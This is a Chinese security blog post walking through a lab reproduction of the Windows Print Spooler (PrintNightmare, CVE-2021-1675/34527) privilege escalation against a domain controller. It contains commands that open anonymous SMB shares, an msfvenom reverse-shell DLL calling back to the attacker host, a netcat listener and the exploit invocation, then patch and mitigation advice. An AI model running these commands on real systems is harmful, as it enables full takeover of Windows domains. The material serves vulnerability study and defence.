Loading [MathJax]/jax/input/TeX/config.js
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >CVE-2021-1675/34527:Windows Print Spooler权限提升复现

CVE-2021-1675/34527:Windows Print Spooler权限提升复现

作者头像
Timeline Sec
发布于 2021-08-20 08:04:10
发布于 2021-08-20 08:04:10
3.6K11
代码可运行
举报
文章被收录于专栏:Timeline SecTimeline Sec
运行总次数:1
代码可运行

作者:shiyi@Timeline Sec

本文字数:1191

阅读时长:3~4min

声明:仅供学习参考使用,请勿用作违法用途,否则后果自负

0x01 简介

Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。

0x02 漏洞概述

攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序,若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。

0x03 影响版本

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
* Windows Server 2019 (Server Core installation)  
* Windows Server 2012 R2 (Server Core installation)
* Windows Server 2012 R2
* Windows Server 2012 (Server Core installation)
* Windows Server 2012
* Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
* Windows RT 8.1
* Windows 8.1 for x64-based systems
* Windows 8.1 for 32-bit systems
* Windows 7 for x64-based Systems Service Pack 1
* Windows 7 for 32-bit Systems Service Pack 1
* Windows 10 Version 1607 for x64-based Systems
* Windows 10 Version 1607 for 32-bit Systems

0x04 环境搭建

目标域:

Windows Server 2019域环境 ( test.com ) IP:192.168.3.3 攻击机:Kali-2021 IP:192.168.3.55 普通域账户密码: win10/windows10>?impact包: https://github.com/cube0x0/impacket

代码语言:javascript
代码运行次数:0
运行
复制
代码语言:javascript
代码运行次数:0
运行
复制

Linux配置smb匿名访问:

1、修改/etc/samba/smb.conf文件

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445
[smb]
    comment = Samba
    path = /usr/share2    
    guest ok = yes
    read only = no
    browsable = yes

PS:

对于 [global] 只需要把 idmap config * : backend = tdb 前面的分号删掉,然后再添加一条 smb ports = 445 即可,其他项都是默认的,最后把整个 [smb] 添加上去

2、重启samba

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
service smbd restart

3、创建共享文件夹

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
mkdir /usr/share2

Windows配置匿名访问:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
mkdir C:\share
icacls C:\share\ /T /grant "ANONYMOUS LOGON":r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'(powershell下运行不适合win7)
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f

0x05 漏洞复现

1、安装impact包

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

2、Kali生成恶意dll文件

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.3.55 LPORT=4444 -f dll -o /usr/share2/shell.dll

3、msf或者nc开启监听

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
msf 和 nc开启监听都可以 
nc -lnvp 4444

4、执行exp

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
exp地址:https://github.com/cube0x0/CVE-2021-1675
python3 CVE-2021-1675.py test.com/win10:"windows10>?"@192.168.3.3 '\\192.168.3.55\smb\shell.dll'

虽然报错了 但是已经收到了shell

0x06 修复建议

1.官方建议:

目前官方已发布漏洞修复补丁,建议受影响用户尽快更新漏洞补丁。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675

2. 临时防护措施:

若相关用户暂时无法进行补丁更新,可通过禁用Print Spooler服务来进行缓解:

1)在服务应用(services.msc)中找到Print Spooler服务。

2)停止运行服务,同时将“启动类型”修改为“禁用”。

**坑点**

1、windows defender 关闭

defender没关闭之前,exp一直失败,然后就尝试关闭defender,就可以成功(dll未免杀的原因)。

2、windows共享利用失败

在windows上测试开启共享之后,能够在域控上匿名访问到共享文件,但是exp一直失败。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
参考链接:

https://github.com/cube0x0/CVE-2021-1675

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-08-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
1 条评论
热度
最新
windows上测试开启共享之后,能够在域控上匿名访问到共享文件,但是exp一直失败。这个问题怎么解决的?
windows上测试开启共享之后,能够在域控上匿名访问到共享文件,但是exp一直失败。这个问题怎么解决的?
回复回复点赞举报
推荐阅读
编辑精选文章
换一批
CVE-2025-50154|Microsoft Windows 文件资源管理器欺骗漏洞(POC)
Windows文件资源管理器是Windows操作系统的核心文件管理工具,用于浏览、整理文件和文件夹。它采用树形结构视图展示本地磁盘和网络资源,支持复制、移动、删除等操作。界面包含导航窗格、地址栏和功能区菜单,便于快速访问和预览。
信安百科
2025/08/18
1980
CVE-2025-50154|Microsoft Windows 文件资源管理器欺骗漏洞(POC)
Windows Print Spooler CVE-2021-1675 漏洞复现
Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。近期安全研究人员在Github公布了Windows PrintSpooler远程代码执行漏洞POC。攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序,若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。
Khan安全团队
2021/07/08
8990
Windows Print Spooler CVE-2021-1675 漏洞复现
Windows Print Spooler权限提升漏洞( PrintNightmare)
Windows Print Spooler权限提升漏洞(PrintNightmare)
谢公子
2022/01/20
1.8K0
Windows Print Spooler权限提升漏洞( PrintNightmare)
Cve-2021-1675 or cve-2021-34527?
Detailed analysis and exploitation of windows print spooler 0day vulnerability
黑白天安全
2021/07/16
1.5K0
微软通杀漏洞-CVE-2021-1675复现
或许需要:SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限
Gamma实验室
2021/07/23
9390
微软通杀漏洞-CVE-2021-1675复现
Windows NetLogon权限提升漏洞(CVE-2019-1424) 复现
2020年08月11日,微软MSRC官方发布了NetLogon特权提升漏洞的安全通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重, CVSS 评分:10.0。该漏洞由Secura公司的Tom Tervoort发现提交,因此被命名为ZeroLogon。
pensar
2020/09/24
1.9K0
Windows NetLogon权限提升漏洞(CVE-2019-1424) 复现
CVE-2021-1675 Windows Print Spooler RCE EXP
让我们检查一下关于 RpcAddPrinterDriver 调用的 MS-RPRN:打印系统远程协议。
Khan安全团队
2021/07/08
1.3K0
CVE-2021-1675 Windows Print Spooler RCE EXP
【漏洞复现】CVE-2025-33073|Windows SMB 权限提升漏洞
Windows 是微软研发的图形界面操作系统,应用于计算机、手机等设备,有普通版、服务器版、手机版等系列,是全球广泛使用的系统之一。
信安百科
2025/07/30
2660
【漏洞复现】CVE-2025-33073|Windows SMB 权限提升漏洞
CVE-2021-1732:Windows Win32k提权
Windows Server, version 20H2 (Server Core Installation)
Al1ex
2021/07/21
3270
CVE-2021-1732:Windows Win32k提权
CVE-2025-33073|Windows SMB权限提升漏洞
Windows 是微软研发的图形界面操作系统,应用于计算机、手机等设备,有普通版、服务器版、手机版等系列,是全球广泛使用的系统之一。
信安百科
2025/07/30
2260
CVE-2025-33073|Windows SMB权限提升漏洞
【漏洞通告】微软SMBv3协议远程代码执行漏洞(CVE-2020-0796)PoC公开处置手册
北京时间6月2日晚,绿盟科技监测到有研究人员公布了SMBv3协议远程代码执行漏洞(CVE-2020-0796)远程利用的PoC代码,极大的增加了该漏洞的潜在危害,建议还未修复漏洞的用户尽快采取措施进行防护。
绿盟科技安全情报
2020/06/05
1K0
CVE-2020-1472复现指北
2020年8月11号,微软修复了Netlogon 特权提升漏洞,当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应用程序。
黑伞安全
2020/09/18
2.2K0
CVE-2020-1472 ZeroLogon漏洞分析利用
CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,此漏洞是微软8月份发布安全公告披露的紧急漏洞,CVSS评分为10分。未经身份认证的攻击者可通过使用 Netlogon 远程协议(MS-NRPC)连接域控制器来利用此漏洞,成功利用此漏洞的攻击者可获得域管理员权限。该漏洞由 Secura 公司的 Tom Tervoort 发现提交并命名为 ZeroLogon。
谢公子
2022/01/20
1K0
CVE-2020-1472 ZeroLogon漏洞分析利用
CVE-2021-1732:Windows Win32k提权
Windows Server, version 20H2 (Server Core Installation)
Al1ex
2021/03/27
1.4K0
CVE-2021-1732:Windows Win32k提权
域渗透-常用漏洞命令总结
 0x01MS08-067  RPC远程缓冲区溢出导致的远程代码执行漏洞 适用:Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta use exploit/windows/smb/ms08_067_netapi #使用模块set rhosts 172.16.5.27 #设置靶机ipset lhost 172.16.5.28 #设置本地ipset payload generic/shell_bind_tcp #设置pay
FB客服
2023/03/29
8740
域渗透-常用漏洞命令总结
【安全通告】Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)
腾讯云安全运营中心监测到, 微软Windows Active Directory 域服务权限提升漏洞,漏洞利用细节和工具被公开,漏洞编号CVE-2021-42287,CVE-2021-42278。可导致攻击者将域内普通用户提升至管理员权限等危害。 为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 漏洞详情 该漏洞是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。 风险等级 高风险 漏洞风
云鼎实验室
2021/12/15
2.8K0
【安全更新】微软1月安全更新多个产品高危漏洞通告
北京时间1月13日,微软发布1月安全更新补丁,修复了83个安全问题,涉及Microsoft Windows、Microsoft Office、Microsoft SQL Server、Visual Studio、Microsoft Defender等广泛使用的产品,其中包括远程代码执行和权限提升等高危漏洞类型。
绿盟科技安全情报
2021/01/18
1.4K0
漏洞复现 | CVE-2020-0796 (SMBv3远程代码执行) Windows-10
大家好,这里是 渗透攻击红队 的第 42 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更
渗透攻击红队
2020/12/14
8.7K0
社工钓鱼之Office钓鱼(上)
CVE-2017-8759是一个新型的Office文档高级威胁攻击漏洞,该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码,FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本,黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net库漏洞,在Office文档中加载执行远程的恶意.NET代码
Al1ex
2023/05/26
7320
社工钓鱼之Office钓鱼(上)
CVE-2020-1472复现打域控
Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空
网络安全自修室
2021/06/21
2.4K0
CVE-2020-1472复现打域控
推荐阅读
相关推荐
CVE-2025-50154|Microsoft Windows 文件资源管理器欺骗漏洞(POC)
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档